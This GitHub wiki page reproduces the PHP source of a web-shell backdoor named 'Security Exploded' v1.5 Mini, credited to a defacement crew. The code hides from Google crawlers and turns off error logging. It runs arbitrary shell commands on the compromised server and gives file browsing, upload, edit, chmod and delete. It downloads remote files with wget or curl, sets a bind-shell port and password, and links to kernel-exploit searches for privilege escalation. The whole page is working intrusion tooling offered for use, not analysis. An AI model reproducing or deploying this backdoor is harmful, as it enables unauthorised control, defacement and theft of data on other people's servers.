Shell.php - GalackHaxor/Galack GitHub Wiki
Crew's : Milton | Aris Dot ID | ./r00t_NTx | ./Port22 | MyMind404 | ./KriZ | ./BlackJoker |"; //Script Deface. (html, php, txt) /* Content is encrypted by gzdeflate , base64 , and others . if you want the source code , please use the tool "PHP Decrypter". In case you dont trust me :-P */ $xName = "Security Exploded"; $versi = "v1.5 Mini"; // Shell Version $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '2.1'); if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); } function printLogin() { ?> <title>Security Exploded</title> <style type="text/css"> body { background-color:transparan;background:#000;background-image: url("http://oi60.tinypic.com/in74pi.jpg");background-position: center; background-attachment: fixed;background-repeat: repeat; } .tabnez{ margin:30px auto 0 auto;border: 1px solid #333333; color: grey; -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;} body,td,th {font-family: Verdana;font-size: 12px;color: grey;font-weight: bold;} input {BORDER-RIGHT:grey 1px solid;BORDER-TOP:grey 1px solid;BORDER-LEFT:grey 1px solid;BORDER-BOTTOM: grey 1px solid;BACKGROUND-COLOR: #111111;COLOR: grey;font: 8pt Verdana;} </style><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
<img src="https://image.noelshack.com/fichiers/2018/19/7/1526170989-cooltext286106528367598.png" title="./Port22" style="float:left" alt="Exploded" '/>
@readfile($d.$f); exit; } //php info $phpinfo = "?&x=phpinfo"; // Server software
$software = getenv("SERVER_SOFTWARE"); // CMD $cmdbox = "help"; // Server Port $serverport = $_SERVER["SERVER_PORT"]; // Backdoor Name $backdoor_name = "$title "; // check safemode if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; // uname -a $system = @php_uname(); // detector function showstat($stat) {if ($stat=="on") {return "ON";}else {return "OFF";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }} function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}} function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}} function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}} function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}} // check os if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; // change directory if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } //hdd function convertByte($s) { if($s<=0) return 0; $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); $e = floor(log($s)/log(1024)); return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e)))); } //
// username, id, shell prompt and working directory if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." $ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\"; // find drive letters $v = explode("\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\"); if ($bool) { $letters .= "<a href="?y=".$letter.":\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class="gaya">".$letter."";} $letters .= " ] "; } } }
function getrealip(){ if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip=$_SERVER['HTTP_CLIENT_IP']; }elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR'])) //TO CHEK IP IS PASS FROM PROXY { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else { $ip=$_SERVER['REMOTE_ADDR']; } return $ip; }
function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "".$disablefunc.""; } else { return "NONE"; } }
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; // server ip $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); // your ip ;-) $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "exploded"; // Security Exploded $uplink = "http://www.security-exploded.org/search/label/Exploded Shell Backdoor"; //wilworm $release = @php_uname('r'); $kernel = @php_uname('s'); $millink='http://milw0rm.com/search.php?dong=';
if( strpos('Linux', $kernel) !== false )
$millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
// Exploit-db
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if( strpos('Linux', $kernel) !== false )
$explink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
else
$explink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
// separate the working direcotory $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href="?y=".$pathz."">".$pwds[$i]." ".DIRECTORY_SEPARATOR." "; }
// Rename file or folder if(isset($_POST['Rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @Rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['uploadcompt'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah);} }
if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; } else { echo ''; } } if(isset($_POST['Chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @Chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['Chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @Chmod($pwd.$name,octdec($value)); $file = $pwd.$name;}
////////////////////////////////// // print useful info
$buff = "Shell Backdoor : $backdoor_name $versi <span class="gaya"><span class="gaya"> | [ Security Exploded ]
Version : ".$versi."
Software : ".$software."
";
$buff .= "System OS : ".$system." | [ Google ] | [ Milw0rm ] | [ Exploit-db ]
";
if($id != "") $buff .= "ID : ".$id."
";
$buff .= "PHP Version : ".phpversion()." ON ".php_sapi_name()."<span class="gaya"> | [ PHP Info ]
";
$buff .= "Server IP : ".$server_ip." <span class="gaya"> | Port Server : ".$serverport."<span class="gaya"> | Your IP Surving : ".getrealip()."<span class="gaya"> | Admin : ".$admin_id."
";
$buff .= "Free Disk: ".convertByte(disk_free_space("/"))." <span class="gaya"> / ".convertByte(disk_total_space("/"))."
";
if($safemode) $buff .= "Safemode: <span class="gaya">ON
";
else $buff .= "Safemode: <span class="gaya">OFF
";
$buff .= "Disable Functions: ".showdisablefunctions()."
";
$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | Python: ".testpython()." | Ruby: ".testruby()." | Java: ".testjava()." | GCC: ".testgcc()." | cURL: ".testcurl()." | WGet: ".testwget()."
";
$buff .="Drive : ".$letters." > ".$pwdurl."";
function rapih($text){
return trim(str_replace("
","",$text));
}
function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "
<form action="?y=".$pwd."&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:45%;"> $prompt <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value=help /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="".$pwd."" /> View <input onMouseOver="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="".$pwd."" /><input class="inputzbut" type="submit" value="View !" name="submitcmd" style="width:80px;" /></form></table><br><table class=\"explore\">
<tr><th>Name</th><th style=\"width:80px;\">Size</th><th style=\"width:210px;\">Owner:Group</th><th style=\"width:80px;\">Perms</th><th style=\"width:110px;\">Modified</th><th style=\"width:190px;\">Actions</th></tr>
";
if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == ".") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
<td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
<a href=\"?y=$pwd&edit=".$pwd."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">New Folder</a> | <a href=\"javascript:tukar('titik1','titik4_form');\">Upload</a></span>
<form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
</form>
<form action=\"\" id=\"titik4_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
<input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
</form></td>
</tr>
";
}
elseif($folder == "..") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
<td style=\"text-align:center;\">".$owner."</td>
<td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
<td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">New Folder</a> | <a href=\"javascript:tukar('titik2','titik3_form');\">Upload</a></span>
<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
</form>
<form action=\"\" id=\"titik3_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
<input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
</form>
</td></tr>";
}
else {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
</form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
<td><center>
<a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Chmod_folder\" value=\"Chmod\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
<td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">Rename</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\">Upload</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">Delete</a></span>
<form action=\"\" id=\"".clearspace($folder)."_form4\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
<input class=\"inputz\" name=\"path\" type=\"text\" size=\"33\" value=\"".$pwd.$folder.DIRECTORY_SEPARATOR."\" /><br>
<input class=\"inputzbut\" name=\"uploadcompt\" type=\"submit\" value=\"Upload\"/>
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\" />
</form>
</td></tr>";
}
}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
</form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
<a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type="hidden" name="name" value="".$file."" style="margin:0;padding:0;" /> <input class="inputz" style="width:150px;" type="text" name="newvalue" value="".substr(sprintf('%o', fileperms($full)), -4)."" /> <input class="inputzbut" type="submit" name="Chmod" value="Chmod" /> <input class="inputzbut" type="submit" name="Cancel" value="Cancel" onclick="tukar('".clearspace($file)."_link','".clearspace($file)."_form2');" />
<td style="text-align:center;">".date("d-M-Y H:i",@filemtime($full))." <a href="?y=$pwd&edit=$full">Edit | <a href="javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');">Rename | <a href="?y=$pwd&delete=$full">Delete | <a href="?y=$pwd&dl=$full">Download (<a href="?y=$pwd&dlgzip=$full">Gz)"; } $buff .= ""; return $buff; }function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; }
function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } }
function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } }
function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } }
function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } }
function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; }
function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; }
function clearspace($text){ return str_replace(" ","_",$text); }
?>
<title>=$title ?> =$versi ?></title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style> <style type="text/css"> body { background-color:transparan;background:#000;background-image: url("=$background; ?>");background-position: center; background-attachment: fixed;background-repeat: no-repeat; } a {text-decoration:none; } a:hover{ border-bottom:1px solid #00ff00; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:=$color; ?>; } #menu{ background-color:transparan; margin:8px 2px 4px 2px; }#menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; -moz-border-radius: 5px; -moz-box-shadow-webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; }
.tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; color: #FFCC00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ;} .msupiani{ font-family:Vivaldi;font-size:50px;color: #00FF00;} .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .main { width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .gaya { color: $color; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .inputzbut{ background:#111111; color:=$color; ?>; margin:0 4px; border:1px solid #444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ;
} .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #00ff00; border-top:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .output { margin:auto; border:1px solid =$color; ?>; width:100%; height:400px; background:#000000; padding:0 2px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .cmdbox{ width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .head_info{ padding: 0 4px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .exploded{ font-size:30px; padding:0; color:#444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .exploded_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px ; } .explore{ width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px =$color; ?>; -webkit-box-shadow:0px 0px 5px 